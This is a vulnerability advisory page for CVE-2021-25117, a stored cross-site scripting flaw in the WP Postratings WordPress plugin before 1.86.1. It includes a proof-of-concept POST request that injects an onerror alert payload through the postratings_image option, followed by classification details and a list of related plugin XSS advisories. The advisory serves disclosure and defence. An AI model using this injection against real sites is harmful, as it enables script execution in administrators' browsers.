WP Postratings < 1.86.1 – Admin+ Stored Cross-Site Scripting | CVE 2021-25117 | Plugin Vulnerabilities

Description

The plugin does not sanitise the postratings_image parameter from its options page (wp-admin/admin.php?page=wp-postratings/postratings-options.php). Even though the page is only accessible to administrators, and protected against CSRF attacks, the issue is still exploitable when the unfiltered_html capability is disabled.

Proof of Concept

POST /wp-admin/admin.php?page=wp-postratings/postratings-options.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1954
Connection: close
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1

_wpnonce=fad0d9fb37&postratings_image=plusminus_crystal\"+onerror=alert(/XSS/);/&postratings_max=2&[SNIPPED]&Submit=Save+Changes

Affects Plugins

Fixed in 1.86.1

References

CVE

Exploitdb

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Park Won Seok

Verified

Yes

WPVDB ID

d2d9a789-edae-4ae1-92af-e6132db7efcd

Timeline

Publicly Published

2020-12-24 (about 3 years ago)

Added

2020-12-24 (about 3 years ago)

Last Updated

2022-04-09 (about 2 years ago)

Other

Published

Title

Published

2011-09-27

Title

News < 0.2 - XSS

Published

2021-08-09

Title

Stop Spammers Security < 2021.18 - Authenticated Stored XSS

Published

2024-05-01

Title

WP Video Lightbox < 1.9.11 - Authenticated (Contributor+) Stored Cross-Site Scripting via width Parameter

Published

2023-10-25

Title

Simple User Listing < 1.9.3 - Reflected XSS

Published

2023-12-18

Title

AMP for WP – Accelerated Mobile Pages < 1.0.92.1 - Authenticated (Contributor+) Cross-Site Scripting via Shortcode